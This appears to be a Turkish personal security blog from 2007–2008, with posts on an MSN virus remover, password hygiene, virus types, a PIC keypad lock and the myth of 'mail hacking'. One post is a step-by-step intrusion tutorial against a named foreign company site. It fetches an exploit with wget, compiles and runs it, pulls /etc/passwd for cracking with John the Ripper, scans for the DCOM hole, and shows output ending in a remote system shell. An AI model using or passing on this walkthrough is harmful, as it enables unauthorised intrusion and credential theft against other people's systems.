29.4.08
MSN Photo Virus Removal 3.6


Son zamanlarda MSN Messenger üzerinden yayilan, bulastigi bilgisayarlarin MSN Messenger hesaplarindaki kisi listeleri araciligi ile diger kullanicilara da bulasan virüsü silmek için yapilmis ücretsiz bir araç।


Program MSN Messenger’a bulasan virüsleri silme amaçli olup programi her çalistirisinizda üretici sitesinden otomatik olarak güncel veritabanini indirip kendini güncellemektedir. Programi çalistirdiginizda internet baglantinizda bir problem yoksa program basariyla güncellenecektir.

Güncelleme yaptiktan sonra bilgisayarinizi güvenli kipte açip yönetici (administrator) hesabi ile de oturum açmaniz gerekiyor.

Ardindan programi çalistirip Start demeniz yeterli। Program tarama islemi sonucunda masaüstüne programin tarama sonuçlarini belirten bir günlük dosyasi birakacaktir. Buradan sonucu ögrenebilirsiniz. BURADAN indirebilirsiniz.

Etiketler:

 
posted by The Joker at 6:24 AM | Permalink | 0 comments
18.3.08

Şifre Kırıcılar ve Güvenli Bir Şifre


Şifre kırıcılar genellikle yanlış yorumlandığından öncelikle bunu tanımlayalım. Herhangi bir şifre kırıcı ne var olan şifreyi deşifre eder nede şifre korumasını kaldırır. Genellikle şifre kırıcılar bir kelimeden sonra diğer bir kelimeyi deneyerek şifreyi bulurlar. Ayrıca şifre kırıcı eşittir hacker şeklindeki anlayış tamamen yanlıştır. İlla ingilizce bir kavram ile karşılık bulunmak istenirse "şifre kırıcı= password cracker" denilebilir.

Şifreleme işlemi genellikle tek yönlü olarak yapılmaktadır. Yani bir şifrenin şifreleme işleminden sonra tekrar deşifresi mümkün değildir. Aslında şifre güvenliği konusu güvenliğin çekirdeğine kadar iner genel sorun kullanıcıların şifrelerini belirlerken basit düşünmeleri buna bağlı olarak kolay çözülebilen şifreler vermeleridir. Bunun en komik örneği ise şifre olarak "şifre" ve "password" kelimelerinin belirlenmesidir.

Bir dosyanın şifrelenmesinde, sitenize koyduğunuz herhangi bir şifreli sayfada, FTP veya internete bağlanırken kullandığınız şifrelere büyük önem göstermek güvenliğiniz açısından oldukça önemlidir. Bu nedenle şifre verirken bazı unsurlara dikkat edilmelidir.

>>Şifre belirlerken yapılmaması gerekenler;

*Asla kullanıcı adınızı yada şahsi bilgilerinizi içeren bir şifre kullanmayın.

*Şifre kısmını boş bırakmayın "enter" tuşuna basmak pekte zor değildir, sadece şifre ekranıda çaydırıcı bir etken olarak görülemez.

*Günlük hayatta sıkca kullanılan kelimeleri kullanmayın. Örn (selam....)

*Yalnızca küçük, büyük harf yada sayıdan oluşan şifreler vermeyin.

*En sevdiğiniz aktör, film, müzik grubu yada şarkıcı isimlerini şifre olarak belirlemeyin.Bu tür bilgiler size özgü olmasına rağmen ulaşılması en kolay olanlardır.

*Belirli bir kelimeyi şifre olarak kullanacaksanız sözlükte verildiği gibi kullanmamaya çalışın। Örn (komedi=K0m3D1)

*Şifrenizde kullandığınız bi karakteri mümkün olduğunca tekrar etmemeye çalışın.

*Şifrelerinizi bir kağıtta, cep telefonunda yada bilgisayarınızda kayıtlı tutmayın.

*Şifrenizi ne gerekeçe olursa olsun kimseyle paylaşmayın.

>>Şifre belirlerken yapmanız gerekenler;

*En az 8 karakterden oluşan bir şifre belirleyin.

*Rakam, küçük/büyük harf ve özel işaretleri kullanın.

*Daha kolay hatırlamak için bir cümledeki kelimelerin baş harflerinden oluşan karakter grubunun başına ve sonuna özel işaret koyarak kullanabilirsiniz।Yada sevdiğiniz bir cümleyi tarihiyle birlikte kullanmak daha güvenli olacaktır.Örneğin; Unix işletim sistemini çalıştıran makina sayısı 10 ve bunun artması bekleniyor 1972=&UiScMs10vbAB1972&

*Farklı makinelerde, sitelerde, mail hesaplarında farklı şifreler kullanın

Etiketler:

 
posted by The Joker at 3:51 AM | Permalink | 0 comments
19.2.08
Virus Tipleri
Worms (Solucanlar);

Kendilerini kopyalama özelliğine sahiptirler. İnternet yada yerel ağ üzerinde bilgisayardan bilgisayara yayılırlar. Bazıları zararsızdır ancak sistemde yer kaplar ve bilgisayarı yavaşlatırlar. Bazıları ise zararlıdır ve bilgisayara zarar verir.
Trojan Virüsleri;
Bu virüsler bulaştıkları sistemde yayılmazlar,çoğalmazlar. Trojanı hazırlayan kişi tarafından yönetilmekte trojanı hazırlayıp yöneten kişi kötü niyetle kullansa kurbanın kişisel bilgilerini rahatlıkla ulaşabilir. Kurbanın bilgisayarını yönetebilir.
Makro Virüsleri;
Word Excel gibi makro kullanımına olanak sağlayan programların dosyalarına bulaşan virüslerdir. Bunlar Word yada Excel kullanarak hazırladığınız belgeye yerleşir ve bu belgeye her girişte aktif hale geçer.
Boot Virüsleri;
Disketlerin ‘boot sector’ veya sabit disklerin ‘master boot sector’ diye isimlendirilen ilk sektörlerine sıçrarlar ve çoğalarak diğer bilgisayarlara disketler, e.mail gibi yöntemlerle bulaşır ve yayılırlar. Bulunması ve temizlenmesi en kolay virüslerdir çünkü yerleri bellidir.
Dosya Virüsleri;
Exe gibi çalışabilir dosyalara bulaşırlar ve bu dosyalardan diğer dosyalara sıçrarlar. Ne kadar dosyaya sıçradıklarına bağlı olarak dosyanın boyutunu arttırırlar. Dosyaya bulaşan virüs yazılımı dosyanın sonunda bezende ortasında olabilir. Bu virüsler hafızada kalabilme özelliğine sahiptirler.
Polimorfik Virüsler;
Sürekli olarak kendini değiştiren virüslerdir. Bulunması ve temizlenmesi farklı teknoloji gerektiren bir virüs türüdür.
Hoaxlar;
Hoaxlar virüs olduğu söylenen fakat aslında virüs olmayan aldatmacalardır. Bunlar sadece kullanıcılarda panik yaratmak için hazırlanmış olabileceği gibi daha sonradan yazılacak bir virüsün etkisini artırmak amacıyla da hazırlanmış olabilir.

Guvenli.Org 3m1r tarafindan yazilmistir. kaynak belirtmeden baska yerlerde yayinlamayiniz.

Etiketler:

 
posted by The Joker at 6:16 AM | Permalink | 0 comments
5.11.07
1- Exploit nedir?

Exploitler belli dilerde yazilmis ve bir kapali kutuda yetki alabilmek icin yada sahip oldugumuz yetkimizi artirmak icin yazilmis programlardir. Birkac turu vardir. Bu programalr internetin en karanlik yuzunu olusturur oyle paralar doner ki exploit yazarlari Dunyadaki eb zengin programcilardir. (Micro$oft u ele almiyoruz cunku bu kisiler tek basina olan kisilerdir.) Cok buyuk paralar doner. Internet Explorer Active X icin yazilmis 10000$ gibi bir ucrete satilan exploit biliyorum. Ama asil konumuz Web Hack icin kullanacagimiz Exploitlerdir. Bence Viruslerden sonra en karizmatik programlar diyebiliriz exploitlere. Bilmeniz gereken baska birsey ise her kapali kutuda her exploit calismaz. kapali kutunun OS una gore exploit kullanabiliriz.

Local Exploitler

Bu Exploitlerin erise bildigimiz kapali kutularda yetkimizi arttirmak icindir. En dusuk yetkiye dahi sahip olsak bir kapali kutuda calistirdigimiz zaman root yetkisine ulasabiliriz.

Remote Exploitler

Bu exploitler ise hic bir erisim hakkimiz olmadigi bir uzaktaki kapali kutuyu denetim altina almamizi saglarlar ki bizim icini onemli olan exploitler bunlardir.

2- Shell Nedir ?
Shell Linux OS kullanan bir kapali kutudaki kisitli yetkiler ile size verilen bir alandir. Exploitler Shell de de derlenebilirler. ki ilk olarak analtacagim. Shell de exploit derlemektir.

3- Shell de Exploit Derlemek

Kendimize bir hedef site sececegiz orn: http://www.blackhammer.com/ (bir yabanci firma) oncelikli olarak hedef sitenin OS bilgilerini bilmeliyiz (dokumanin sonunda gerekli Linkleri verecegim). Daha sonra kapali kutunun OS una gore exploit imizi buluyoruz (dokuman sonunda exploit linklerinide bulabilirsiniz.) Daha sonra bu OS exploit in destekelyen bir shell hesabimizin olmasi gerekiyorki burda google.com yardimiza yetisiyor.

Daha sonra hedef kapali kutu icin uygun exploitmizi host umza upload ediyoruz ki adini degismeyeceksiniz. (orn: bLack.c exploiti) Buradan sonraki asamalar ne kadar karisik sanilsada aslinda en kolay seylerdir. Simdi Linux da shell imizi acalim Linux da yetkimize gore shell acilir. Simdi Shell vasitasi ile exploit i bilgisayarimiza indirelim.

bunu yapmak icin "wget http://Upload_ettigimiz_host/bLack.c" komutu ile exploit i bilgisayarimiza indirebiliyoruz. Bu sekildeki bir exploit isimize yaramaz cunku deaktif durumdadir. Aktif duruma getirmek icin GGC Compiler i kullaniriz genelde butun shell lerde mevcuttur. Fakat ucretsiz shell lerde kapatilmis durumda olabiliyor. Simdi exploit bilgisayarimizdadir ama onu goremeyiz exploit i gorebilmek icin shell de "ls" yazarak gorebiliriz. Simdi exploit imizi derleme zamani. Bunun icin "gcc -o bLack bLack.c" yazarak derleyebilirsiniz. Simdi shell de "ls" yazarak exploit imizin derlenmis halinide gorebiliriz (black & black.c) bizim kullanacagimiz bLack.c dir. Derledigimiz exploit imizi kullanmak icinse "./black -h www.bLackhammer.com" komutu ile kullanabiliyoruz.

Exploit imizin calisip calismamasi sizin kendi probleminizdir bazen derlemede hata yapabiliyor insan oglu. Bu derledigimiz exploit ile yapabileceklerimiz kullandigimiz exploit in yetenekleri ile sinirlidir. Mesela sitenin sifre dosyasidir. Sifre dosyasini "etc/passwd" komutu ile cekebiliriz. Eger basarili bir girisimde bulunduysak John The Ripper yada benzeri bir program ile kirarak sifreyi ele gecirebikliriz. Unutmammiz gerekn birsey var her zaman exploit ile sitenin passwd dosyasini cekebilirm diye birsey yoktur. Her zaman sitenin ana dizinie ulasamayabiliriz ki bu tur seyler sizi yildirmasin benim basima cok gelmisti.

4- Perl de Exploit Derlemek
Perl de exploit derlemek icin bilgisayarimizda ActivePerl in kurulu olmasi gerekiyor. Eger ActivePerl i kurduysaniz bilgisayarinizda "c:Perl" diye bir kalsor olusacaktir. Simdi Hedef kapali kutumuz uygun exploit imizi de ayarladiktan sonra ki bu exploit mizi "bLack.pl" diye notepad de kaydetmemiz gerekir. "bLack.pl" dosyasini "c:PerlBin" klasoru altina tasimaliyiz. Simdi Derlemek icin "Baslat/Calistir/command yada cmd" yazarak MS-DOS penceresini acalim ve Perl dizininde Bin klasorune girelim (cd.. / cd perl / cd bin) simdi buradayken "perl bLack.pl -h www.bLackhammer.com yazin ve exploit mizin ozelliklerine gore yapabilceklerimiz vardir.

5- Ornek bir Uygulama

Dcom Scanner belli bir IP araliginda Dcom acigin olup olmadigi arar. Elimde bu vardi bunu ornek veriyorum Win2k (sp1-sp2-sp3-sp4) ve winXP (sp1) de Dcom acigin arar. (Dcom Scanner in derlenmesini Analtacagim (linux icin) oncelikle Linux a Shell imizde root yetkisine gecelim. "gcc -o dcom2_scanner dcom2_scanner.c" yaziyoruz ve simdi taramaya baslayalim mesela 123.456.789.1 ile 123.456.789.255 araligini tariyacagiz. Bunun icin "./dcom2_scanner 123.456.789.1/24" yazacagiz. karsimiza

123.456.789.1 does not accept DCERPC -- good
123.456.789.2 has both dcom patchs -- good
123.456.789.3 has both dcom patchs -- good
123.456.789.4 has both dcom patchs -- good
** 123.456.789.5 has neither dcom patch -- BAD **

cikar. burda goruldugu gibi 123.456.789.5 nolu IP de dcom acigi tespit edilmistir.

Simdi Dcom exploit imizi derleyelim "gcc -o dcom dcom.c" ver karsimiza sole bisi cikmasi lazim.

[root@bLack root]# ./dcom 5 123.456.789.5
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM
- Using return address of 0x77e9afe3
- Dropping to System Shell...

Microsoft Wind 1985-2000 Microsoft Corp.
(C) Telif Hakky
C:WINDOWSsystem32>

artik sistemdeyiz.

ActivePerl
http://www.activestate.com/Products/ActivePerl/

Dev C++ (windoze altinda C Derlemek icin)
http://www.bloodshed.net/

Sistem OS ogrenmek icin
http://www.netcraft.com

Exploit Kaynaklari
http://www.packetstormsecurity.com/exploits
http://www.k-otik.com
http://www.milw0rm.com/

yazar: bLackhammer

Etiketler:

 
posted by The Joker at 10:25 AM | Permalink | 0 comments
21.10.07
F628 ile 4 haneli Şifre kilit devresi
*Telefon tipi keypad *PIC16F628
*2x16 LCD
*74922(keypad to 4 bit encoder)









Devreyi sifre ile aktif hale gelmesini istedi?iniz alarm,kapy kilidi,kasa kilidi gibi yerlerde kullanabilirsiniz.

http://rapidshare.com/files/22920916/sifre1.rar
rar dosyasynda isis dosyasy ve hex dosyasy mevcutur.


PROGRAM;

*Programy yükleyerek devreyi çaly?trdy?ynyzda size ?ifre sorulur devrenin ba?langyç ?ifresi 1234 dür.
*Bu sire girilip sifre dogru mesaji görüldügünde yildiz tusuna basarak sifreyi degistirebilirisiz.
*sifre degistikten sonra picin resetlenmesi veya gücünün kesilmesi sifreyi baslangyç sifresine
DÖNDÜRMEZ , (çünkü girdiginiz sifre eeproma kaydedilir.)

*sifreyi 3 kere yanlis girerseniz tekrar denemek için 5 dk beklersiniz.
*sifre dogru mesaji oldugu sürece porta.6=1 , yanlis mesaji oldugu sürecede porta.6=0 dir
*sifreyi 3 kez yanlis girip " 5 dk bloke " mesaji görüldügünde reset atmak , enerji kesmek ise yaramaz
yine buda eepromda saklanan bilgidir.
*olduda sifreyi unuttunuz , pici söküp yeniden programlayiniz ancak bu sekilde sifre
1234 olur.

Yazan: Datadiver

Etiketler:

 
posted by The Joker at 3:09 PM | Permalink | 0 comments
18.9.07
merhaba sevgili okuyucular;
bir cogunuz forumlarda "msn hack programi " , "tek tik ile msn hacking" gibisinden basliklar gorursunuz. aslinda "mail hack" diye bir sey yoktur. kullanicinin hatasindan dolayi olusan guvenlik zaafiyetinin kotu insanlar (!) tarafindan kullanilmasi vardir.

mail adresini yaz sonrasinda "sifreyi kir" butonuna basarak mail sifresi al gibisinden bir aciklama ile tanitilan/tartilan bir program yoktur - olmayacaktir - olamayacaktir. olsa bile calismiyordur , kotu emeller icin yazilmistir. bunu bilincsiz kullanicilara anlatmak icin cogu web adminin dilinde tuy bitmistir damagi patlamistir.

ama hala "mail hack" diye sagda solda yazilar yazan-yardim arayan bir suru insan vardir ve gun gectikce bu kisiler cogalmaktadir.

bir kullaniciya iyi kodlanmis bir trojani gonderip ; hedefin bilgisayarinda aktif hale gelmesinden sonra msn sifreleri ve bunun yaninda tum konusmalari size mail olarak gelebilir. bu bir hack degildir. sonucta usta bir programcinin yazdigi bir program ile trojan server olusturmus ve karsi tarafa gondermissiniz sonrasinda sifreleri calmissiniz. bu sizin basariniz degildir bu trojan serveri uretmek icin kullandiginiz programi yazan coder'in basarisidir.

unutmayalim ki bu coder'in basarisi onu hic bir zaman gercek bir hacker yapmaz. cunku gercek bir hacker olmak icin iyi bir programci olmak yetmiyor.daha fazlasi ve cok daha fazlasi gerekli...

fake mail konusuna gelince;
genelde 13-14 yasindaki kisilerin veya bilgisayari hic bilmeyen bir kullanicinin zaafiyetinden dolayi ortaya cikan bir "sifre calma" yontemidir.aksini soyleyen olsa dahi bu boyledir. cunku fake mailin profesyonellik ile alakasi yoktur.
yontem; basitce gelistirilmis bir hotmail.com anasayfasinin ( yahoo , icq vs.vb. 'da olabilir. ) kullaniciya art niyetli bir sekilde kodlanmis halini gondermek ve sonrasinda kullanicinin mail adresini - sifresini yazip giris yapmaya calismasi ile mailin sizin istediginiz bir mail adresine gelmesinden baska bir sey degildir. bir trojani hedefe gonderip gereken sifrelerini almak nasil ki hack degilse fake mail yontemi ile sifre calmakda hack degildir.

bu gun bu tur dusunceler ile yola cikmis insanlar ileride hacker olmamasina ragmen hack ile iyiden iyiye ilgilenmis kisiler tarafindan lamer olarak anilir. ve ileride hacking'de basarili olsa dahi gecmisi her zaman kotu gorunur. zaten bir mailin sifresini calipta okulda,sokakda,internet kafede "ben bir hackerim" diyenlerin tamami kendini tatmin etmek icin , arkadaslarina hava yapmak icin veya kendi ozel sorunlarini acikliga kavusturmak icin ugrasiyor.

bu yaziyi yazma nedenim mail hack diye bir seyin olmadigini yeni baslayan kullanicilara ogretmektir. bu bakimdan " ahmet'in mailini hackledim" tabiri yanlistir.

Written by JoKeR

bu yazi daha once benim istegim uzerine 3vr3n tarafindan wardom'da da yayinlanmistir.

Etiketler:

 
posted by The Joker at 4:34 AM | Permalink | 0 comments